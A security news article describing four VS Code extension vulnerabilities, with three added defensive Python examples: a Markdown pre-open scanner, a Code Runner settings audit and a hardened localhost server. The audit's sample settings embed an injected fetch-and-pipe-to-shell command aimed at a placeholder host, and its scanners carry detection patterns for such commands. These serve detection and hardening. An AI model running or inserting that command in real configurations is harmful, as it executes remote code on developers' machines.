Critical Vulnerabilities Discovered in Four VS Code Extensions with Over 125 Million Installs

Cybersecurity researchers have uncovered serious security vulnerabilities in four widely used Microsoft Visual Studio Code extensions. These flaws could allow attackers to steal sensitive local files and remotely execute malicious code on developers’ machines.

The affected extensions, installed more than 125 million times collectively, include Live Server, Code Runner, Markdown Preview Enhanced, and Microsoft Live Preview.

Security experts from OX Security, Moshe Siman Tov Bustan and Nir Zadok, shared their findings with The Hacker News, warning that a single vulnerable or malicious extension is enough to enable lateral movement inside enterprise environments, potentially leading to full organizational compromise.

Breakdown of the Identified Vulnerabilities

CVE-2025-65717 (Live Server, CVSS 9.1)

This critical vulnerability enables attackers to extract local files. If a developer visits a malicious website while the Live Server extension is active, embedded JavaScript on the page can interact with the local HTTP development server running at localhost:5500. The script can crawl accessible files and transmit them to an attacker-controlled domain.
Status: Unpatched.

CVE-2025-65716 (Markdown Preview Enhanced, CVSS 8.8)

This flaw allows arbitrary JavaScript execution through a specially crafted markdown file. Once opened, the malicious file can enumerate local ports and exfiltrate sensitive data to an external server.
Status: Unpatched.
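A pre-open check of the kind a defender would want for files that reach a preview extension from an untrusted source, as an added example (not Markdown Preview Enhanced's or OX Security's code). Preview extensions render Markdown to HTML inside a webview, and raw HTML in the document (script tags, inline event handlers, javascript: links, frames) is the usual carrier for JavaScript that ends up running in that view. The scanner reports such constructs with line numbers; it assumes the renderer shows fenced code as escaped text, so fenced lines are skipped, and the sample document is constructed for the example.

```python
"""Scan a Markdown file for raw HTML constructs a preview webview could execute.

Added example, not extension code. Assumes fenced code (backtick or tilde
fences) is rendered as escaped text and therefore skips those lines.
"""
import re

# Each entry: (finding name, pattern).  Deliberately simple and case-insensitive.
PATTERNS = [
    ("script-tag", re.compile(r"<\s*script\b", re.I)),
    ("event-handler", re.compile(r"<[^>]*\son\w+\s*=", re.I)),        # <img ... onerror=
    ("embed", re.compile(r"<\s*(iframe|object|embed)\b", re.I)),
    ("javascript-link", re.compile(r"\]\(\s*javascript:", re.I)),      # [text](javascript:...)
    ("javascript-attr", re.compile(r"(href|src)\s*=\s*[\"']?\s*javascript:", re.I)),
]


def scan_markdown(text):
    """Return [(line_number, finding_name, stripped_line), ...] for `text`."""
    findings = []
    in_fence = False
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip()[:3] in ("```", "~~~"):
            in_fence = not in_fence          # fence opener/closer toggles state
            continue
        if in_fence:
            continue                         # code blocks are shown, not rendered
        for name, pattern in PATTERNS:
            if pattern.search(line):
                findings.append((lineno, name, line.strip()))
    return findings


def scan_file(path):
    """Convenience wrapper: scan a file on disk."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_markdown(fh.read())


# Constructed sample: a harmless fenced snippet plus two live HTML constructs.
SAMPLE = """# Release notes
Normal *markdown* text with a [link](https://example.com).
~~~html
<script>shown as text, not executed</script>
~~~
<img src="x" onerror="doSomething()">
[click me](javascript:doSomething())
"""

if __name__ == "__main__":
    for lineno, name, snippet in scan_markdown(SAMPLE):
        print(f"line {lineno}: {name}: {snippet}")
```

Run it against a downloaded README before opening the preview; any finding is a reason to read the file in the plain editor instead. The fence handling is a deliberate assumption: if a renderer does not escape code blocks, drop the `in_fence` skip.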

CVE-2025-65715 (Code Runner, CVSS 7.8)

Attackers can exploit this vulnerability by tricking users into modifying the settings.json configuration file through phishing or social engineering techniques. Once altered, arbitrary code execution becomes possible.
Status: Unpatched.
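A workspace settings audit, as an added example (not Code Runner's or OX Security's code), for the configuration-change path described above. A repository can ship its own .vscode/settings.json, and a user who is talked into accepting or editing such a file hands the extension a new command line to run. The script parses the file (VS Code permits comments and trailing commas), lists every executor-style override so it can be reviewed before the folder is trusted, and flags commands that look like more than "run this file". The watched setting names `code-runner.executorMap` and `code-runner.customCommand` are taken from the extension's documented settings and are assumed current; the sample settings text is constructed for the example, with a placeholder domain.

```python
"""Audit a .vscode/settings.json for Code Runner command overrides.

Added example, not extension code.  Watched setting names are assumed from
Code Runner's documented settings; verify them against the installed version.
"""
import json
import re

WATCHED_PREFIXES = ("code-runner.executorMap", "code-runner.customCommand")
# Heuristic indicators that a "run" command fetches, decodes or pipes to a shell.
SUSPICIOUS = re.compile(
    r"(curl|wget|Invoke-WebRequest|\|\s*(sh|bash)\b|powershell|-enc\b|base64)", re.I
)


def strip_jsonc(text):
    """Drop // and /* */ comments outside strings, then trailing commas."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep escaped char, including \"
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = n if j == -1 else j
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            out.append(c)
            i += 1
    # Trailing-comma removal is lexical; a string literal ending in ",}" would be touched too.
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def parse_settings(text):
    """Parse VS Code's JSON-with-comments into a dict."""
    return json.loads(strip_jsonc(text))


def audit_settings(text, watched=WATCHED_PREFIXES):
    """Return one finding per executor-style command found in the settings."""
    findings = []
    for key, value in parse_settings(text).items():
        if not key.startswith(watched):
            continue
        entries = value.items() if isinstance(value, dict) else [("", value)]
        for language, command in entries:
            if not isinstance(command, str):
                continue
            severity = "suspicious" if SUSPICIOUS.search(command) else "review"
            findings.append(
                {"key": key, "language": language, "command": command, "severity": severity}
            )
    return findings


def audit_file(path):
    with open(path, encoding="utf-8") as fh:
        return audit_settings(fh.read())


# Constructed workspace settings: one plain override, one that pipes to a shell.
SAMPLE = """{
  // constructed for the example
  "editor.tabSize": 2,
  "code-runner.executorMap": {
    "python": "python -u",
    "javascript": "node; curl -s http://placeholder.example/s | sh", /* injected */
  },
}"""

if __name__ == "__main__":
    for finding in audit_settings(SAMPLE):
        print(f"[{finding['severity']}] {finding['key']} {finding['language']}: {finding['command']}")
```

Every override a repository supplies deserves a look, not only the ones the heuristic marks suspicious: the "review" entries are where a quiet substitution of the interpreter would land. Pair the audit with VS Code's Workspace Trust so that an untrusted folder's settings are not applied at all.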

Microsoft Live Preview Vulnerability (No CVE Assigned)

A separate issue in Microsoft Live Preview allowed attackers to access sensitive files by exploiting specially crafted JavaScript requests targeting localhost services. Victims only needed to visit a malicious webpage while the extension was running.
Status: Silently fixed in version 0.4.16, released in September 2025.
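Both the Live Server and the Live Preview findings above come down to a page from another origin reaching a development server that listens on localhost. The following hardened static server is an added example (not Live Server, Live Preview or OX Security code) showing the checks such a server can apply: bind to loopback only, require the expected Host header (so a DNS-rebinding page, which reaches the socket under its own hostname, is refused), reject requests carrying a foreign Origin or a Sec-Fetch-Site: cross-site header, emit no Access-Control-Allow-Origin header, confine paths to the served root and serve no directory listings. The port 5500 is the one the article names; the exact request pattern the reported flaws used is not stated on the page, so the checks here are the general defences, not a description of the specific bugs.

```python
"""Hardened local static file server (added example, not extension code).

The request-level checks are plain functions so they can be tested without
opening a socket; the handler just wires them to http.server.
"""
import os
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlsplit

PORT = 5500  # Live Server's port as named in the article; any port works


def allowed_hosts(port=PORT):
    """Host header values expected when the server is reached via loopback."""
    return {f"localhost:{port}", f"127.0.0.1:{port}"}


def header_verdict(headers, port=PORT):
    """Return None when the request may proceed, else (status, reason).

    `headers` is any mapping with .get(); the handler passes self.headers.
    """
    if headers.get("Host", "") not in allowed_hosts(port):
        # DNS rebinding: the page's own hostname shows up in Host even
        # though the TCP connection arrives on loopback.
        return 403, "unexpected Host header"
    origin = headers.get("Origin")
    if origin is not None and origin not in {f"http://{h}" for h in allowed_hosts(port)}:
        # fetch()/XHR from another site announce that site here.
        return 403, "cross-origin request refused"
    if headers.get("Sec-Fetch-Site") == "cross-site":
        # Browsers set this even on <script>/<img> loads that carry no Origin.
        return 403, "cross-site request refused"
    return None


def resolve_path(raw_path, root):
    """Map a URL path onto a file under `root`; None if it escapes the root."""
    root_real = os.path.realpath(root)
    rel = unquote(urlsplit(raw_path).path).lstrip("/")
    full = os.path.realpath(os.path.join(root_real, rel))   # collapses .. and symlinks
    if full != root_real and not full.startswith(root_real + os.sep):
        return None
    return full


class HardenedHandler(BaseHTTPRequestHandler):
    root = os.getcwd()  # directory being served

    def do_GET(self):
        verdict = header_verdict(self.headers, self.server.server_port)
        if verdict is not None:
            self.send_error(verdict[0], verdict[1])
            return
        full = resolve_path(self.path, self.root)
        if full is None or not os.path.isfile(full):
            self.send_error(404)          # directories get 404 too: no listing
            return
        with open(full, "rb") as fh:
            body = fh.read()
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.send_header("X-Content-Type-Options", "nosniff")
        # Deliberately no Access-Control-Allow-Origin header.
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    # Loopback only: never 0.0.0.0, so other hosts on the LAN cannot connect.
    HTTPServer(("127.0.0.1", PORT), HardenedHandler).serve_forever()
```

Run it from the project directory and load http://localhost:5500/index.html. A request such as `curl -H 'Host: attacker.example:5500' http://127.0.0.1:5500/` gets 403, which is the quick check to run against any local server an extension starts: if a foreign Host or Origin is accepted and files come back, a page in the browser can read them the same way.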


How These VS Code Extension Flaws Impact Developers and Organizations

These vulnerabilities demonstrate how development environments can become entry points for cyberattacks. Since VS Code extensions often operate with elevated permissions, poorly secured extensions can:

  • Execute arbitrary code
  • Modify project files
  • Access local development servers
  • Exfiltrate sensitive data
  • Enable lateral movement within enterprise networks

According to OX Security, even one vulnerable extension can pose an immediate security risk. A single malicious repository, click, or configuration change could compromise an entire system.
